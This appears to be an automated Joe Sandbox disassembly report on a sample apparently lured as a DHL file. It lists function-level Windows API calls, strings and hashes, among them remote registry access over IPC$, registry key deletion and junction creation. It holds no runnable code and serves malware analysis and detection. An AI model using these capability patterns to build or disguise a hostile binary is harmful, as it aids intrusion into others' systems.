                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                      • String ID: %s%u
                                                                                      • API String ID: 4010501982-679674701
                                                                                      • Opcode ID: 9c739ea9f4fcdc8c4c7389fbb61dcfb61d3b701a62bbc7808e7df98bf4d94b64
                                                                                      • Instruction ID: 88c7fbfef6435710bda7f19b3ab2e300aeba1fbb666080f69ebe9cf7073f5f9d
                                                                                      • Opcode Fuzzy Hash: 9c739ea9f4fcdc8c4c7389fbb61dcfb61d3b701a62bbc7808e7df98bf4d94b64
                                                                                      • Instruction Fuzzy Hash: 8491AD71204606AFDB19DF64C885FEAF7E8FF44350F008629F999D2191DB30AA45DF91
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00094994
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 000949DA
                                                                                      • _wcslen.LIBCMT ref: 000949EB
                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 000949F7
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00094A2C
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00094A64
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00094A9D
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00094AE6
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00094B20
                                                                                      • GetWindowRect.USER32(?,?), ref: 00094B8B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                      • String ID: ThumbnailClass
                                                                                      • API String ID: 1311036022-1241985126
                                                                                      • Opcode ID: 8236d0a5cdd0df363d3e16c82a8176dd4e72ce613c7e76c5858f36aa3882bff2
                                                                                      • Instruction ID: 578f2f02ea53a0c183dcf1abae481083bc79ff63b7ee482a4dad64f02209ced6
                                                                                      • Opcode Fuzzy Hash: 8236d0a5cdd0df363d3e16c82a8176dd4e72ce613c7e76c5858f36aa3882bff2
                                                                                      • Instruction Fuzzy Hash: A291BE710082059FEF14CF14C985FAA77E8FF84314F048469FD899A196EB34ED46DBA2
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000C3A9D
                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000C3AA0
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C3AC7
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000C3AEA
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000C3B62
                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 000C3BAC
                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 000C3BC7
                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 000C3BE2
                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 000C3BF6
                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 000C3C13
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$LongWindow
                                                                                      • String ID: p]
                                                                                      • API String ID: 312131281-1923361398
                                                                                      • Opcode ID: e288c12a2e98389e5cff09ec5b4f901061728430ba0d4c0d0079fc6ab5e8c090
                                                                                      • Instruction ID: a1d81d38b03c6e566e599dd2d9538a935f25e5ca9e61876364e8f88be825b3c9
                                                                                      • Opcode Fuzzy Hash: e288c12a2e98389e5cff09ec5b4f901061728430ba0d4c0d0079fc6ab5e8c090
                                                                                      • Instruction Fuzzy Hash: 5D616A75A00248AFDB10DFA8CC81FEE77F8EB09704F104199FA55A72A2D774AE85DB50
                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0009DC20
                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0009DC46
                                                                                      • _wcslen.LIBCMT ref: 0009DC50
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 0009DCA0
                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0009DCBC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                      • API String ID: 1939486746-1459072770
                                                                                      • Opcode ID: f8f6ccaaafb00a61b70e983badc89d21988c982c53c026a0e81609a7e111599a
                                                                                      • Instruction ID: 6b573728c68f310f5531d04b19be6fa18a9a4a48ef48f27b49dae16dcee5c821
                                                                                      • Opcode Fuzzy Hash: f8f6ccaaafb00a61b70e983badc89d21988c982c53c026a0e81609a7e111599a
                                                                                      • Instruction Fuzzy Hash: CE4144729802057AEB14AB74DC07EFF37ACEF42751F10046AFE04AA1C3EB759901A7A4
                                                                                      APIs
                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCC64
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 000BCC8D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD48
                                                                                        • Part of subcall function 000BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 000BCCAA
                                                                                        • Part of subcall function 000BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 000BCCBD
                                                                                        • Part of subcall function 000BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BCCCF
                                                                                        • Part of subcall function 000BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD05
                                                                                        • Part of subcall function 000BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCD28
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BCCF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 2734957052-4033151799
                                                                                      • Opcode ID: 69d6af0e2b6794f9bba4f85ac97cc8785739a9b7e724ef4e9a0895d87e05c03e
                                                                                      • Instruction ID: e91084eddf09d396be1db44bbc9d9849a99be5c8bc5b94296d6c8e0d83058239
                                                                                      • Opcode Fuzzy Hash: 69d6af0e2b6794f9bba4f85ac97cc8785739a9b7e724ef4e9a0895d87e05c03e
                                                                                      • Instruction Fuzzy Hash: 94316E75901129BBFB208B55DC88EFFBBBCEF56750F040169E909E2241DA349E45AAA0
                                                                                      APIs
                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000A3D40
                                                                                      • _wcslen.LIBCMT ref: 000A3D6D
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 000A3D9D
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000A3DBE
                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 000A3DCE
                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000A3E55
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000A3E60
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000A3E6B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                      • String ID: :$\$\??\%s
                                                                                      • API String ID: 1149970189-3457252023
                                                                                      • Opcode ID: dc04d6d74a1fce70ca38b5459a67b5a69ba91f8afac7a9f1ab36d4fb186e890f
                                                                                      • Instruction ID: 8abff16d66703022a1ae62329e431bc475fc74856214465efad1256fc3dbfae3
                                                                                      • Opcode Fuzzy Hash: dc04d6d74a1fce70ca38b5459a67b5a69ba91f8afac7a9f1ab36d4fb186e890f
                                                                                      • Instruction Fuzzy Hash: AE319272900209ABEB219BA0EC49FEF37BDEF89740F1041B5FA09D6161E77497448B64
                                                                                      APIs
                                                                                      • timeGetTime.WINMM ref: 0009E6B4
                                                                                        • Part of subcall function 0004E551: timeGetTime.WINMM(?,?,0009E6D4), ref: 0004E555
                                                                                      • Sleep.KERNEL32(0000000A), ref: 0009E6E1
                                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0009E705
                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0009E727
                                                                                      • SetActiveWindow.USER32 ref: 0009E746
                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0009E754
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0009E773
                                                                                      • Sleep.KERNEL32(000000FA), ref: 0009E77E
                                                                                      • IsWindow.USER32 ref: 0009E78A
                                                                                      • EndDialog.USER32(00000000), ref: 0009E79B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                      • String ID: BUTTON
                                                                                      • API String ID: 1194449130-3405671355
                                                                                      • Opcode ID: 83c500339d79cea6fa6c08803896e8ee9dda54db51e64a5dfb8f5670af2aa27f
                                                                                      • Instruction ID: 47abf56792c8fe5219ffaf1bd236b0ac23ce5b827474d25e5e1fe2581e8899ee
                                                                                      • Opcode Fuzzy Hash: 83c500339d79cea6fa6c08803896e8ee9dda54db51e64a5dfb8f5670af2aa27f
                                                                                      • Instruction Fuzzy Hash: A121A5B0204285BFFF109F60EC8DE397BA9F755748F240424F949819B1DBB6AC80EB25
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0009EA5D
                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0009EA73
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009EA84
                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0009EA96
                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0009EAA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: SendString$_wcslen
                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                      • API String ID: 2420728520-1007645807
                                                                                      • Opcode ID: 85634c65baa8d69abbfefcf5de051f9d51ee0a3a180da5e0f0803b92bd4c7d6e
                                                                                      • Instruction ID: ed1417960ead08646771d537dcf41075fb1f106b10363d5dded2caf870282b51
                                                                                      • Opcode Fuzzy Hash: 85634c65baa8d69abbfefcf5de051f9d51ee0a3a180da5e0f0803b92bd4c7d6e
                                                                                      • Instruction Fuzzy Hash: 4B117331A9425D79DB21E7A1DC4AEFF6ABCEBD1B00F400429B601A60D1EEB15E05D6B1
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00095CE2
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095CFB
                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00095D59
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00095D69
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095D7B
                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00095DCF
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00095DDD
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095DEF
                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00095E31
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00095E44
                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00095E5A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00095E67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                      • String ID:
                                                                                      • API String ID: 3096461208-0
                                                                                      • Opcode ID: 32e13e3e5984a48a1a24e355311910ce5dfceea4e7e0e450e41972716ddc633e
                                                                                      • Instruction ID: 9237768a5c4e4bc090055c9a7e91bc410634b286fbe487dc112d48c025dbc9a6
                                                                                      • Opcode Fuzzy Hash: 32e13e3e5984a48a1a24e355311910ce5dfceea4e7e0e450e41972716ddc633e
                                                                                      • Instruction Fuzzy Hash: E0510CB1A00605AFEF19CF69DD89EAEBBB5EB48301F148229F519E7290D7749E00DB50
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00099717
                                                                                      • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099720
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00099742
                                                                                      • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099745
                                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00099866
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                      • API String ID: 747408836-2268648507
                                                                                      • Opcode ID: 097481150b4e7067b0f443c068bbdbab7f955643dc31a3957185b3d9c517c304
                                                                                      • Instruction ID: f0e0551166dfc316f4fbbe0cf1552beda5dc86a4a4b49c5a205eccc7b80bf91a
                                                                                      • Opcode Fuzzy Hash: 097481150b4e7067b0f443c068bbdbab7f955643dc31a3957185b3d9c517c304
                                                                                      • Instruction Fuzzy Hash: 57413972804209AADF05EBE4CE86EEEB37CAF55340F504069F60572092EF756F48DA61
                                                                                      APIs
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000907A2
                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000907BE
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000907DA
                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00090804
                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0009082C
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00090837
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0009083C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                      • API String ID: 323675364-22481851
                                                                                      • Opcode ID: d59369ba7b689af7280d5aa1efd0b19c2b4933149e9d26bdbc5083d6c099f05f
                                                                                      • Instruction ID: fefda0516a3d790ae055f1fec539230b556ba0cc1e4c753441ef00a0b108e05a
                                                                                      • Opcode Fuzzy Hash: d59369ba7b689af7280d5aa1efd0b19c2b4933149e9d26bdbc5083d6c099f05f
                                                                                      • Instruction Fuzzy Hash: 1B413672D10229AFDF16EBA4DC85CEEB7B8BF04350F144129E945B3161EB709E04CBA0
                                                                                      APIs
                                                                                      • CreateMenu.USER32 ref: 000C3C79
                                                                                      • SetMenu.USER32(?,00000000), ref: 000C3C88
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C3D10
                                                                                      • IsMenu.USER32(?), ref: 000C3D24
                                                                                      • CreatePopupMenu.USER32 ref: 000C3D2E
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000C3D5B
                                                                                      • DrawMenuBar.USER32 ref: 000C3D63
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                      • String ID: 0$F$p]
                                                                                      • API String ID: 161812096-3127141080
                                                                                      • Opcode ID: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                                                                      • Instruction ID: bb9637095a2f00cd8b3ad79d04ec6e909cc9e82f39a1efc198c18bd2fab4abe8
                                                                                      • Opcode Fuzzy Hash: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                                                                      • Instruction Fuzzy Hash: 0E415675A11609AFEB14CF64E884FAE7BB5FF4A350F14402CF94AA7360D774AA50CB90
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 000B3C5C
                                                                                      • CoInitialize.OLE32(00000000), ref: 000B3C8A
                                                                                      • CoUninitialize.OLE32 ref: 000B3C94
                                                                                      • _wcslen.LIBCMT ref: 000B3D2D
                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 000B3DB1
                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 000B3ED5
                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 000B3F0E
                                                                                      • CoGetObject.OLE32(?,00000000,000CFB98,?), ref: 000B3F2D
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 000B3F40
                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000B3FC4
                                                                                      • VariantClear.OLEAUT32(?), ref: 000B3FD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 429561992-0
                                                                                      • Opcode ID: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                                                                      • Instruction ID: f49c25d68d58c97af2e73e69429cbfea94af3a4d45cfdb38bba1e43e42981fd1
                                                                                      • Opcode Fuzzy Hash: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                                                                      • Instruction Fuzzy Hash: 96C144716082059FD700DF68C884DABBBE9FF89744F24492DF98A9B251DB31EE05CB52
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 000A7AF3
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000A7B8F
                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 000A7BA3
                                                                                      • CoCreateInstance.OLE32(000CFD08,00000000,00000001,000F6E6C,?), ref: 000A7BEF
                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000A7C74
                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 000A7CCC
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 000A7D57
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000A7D7A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 000A7D81
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 000A7DD6
                                                                                      • CoUninitialize.OLE32 ref: 000A7DDC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
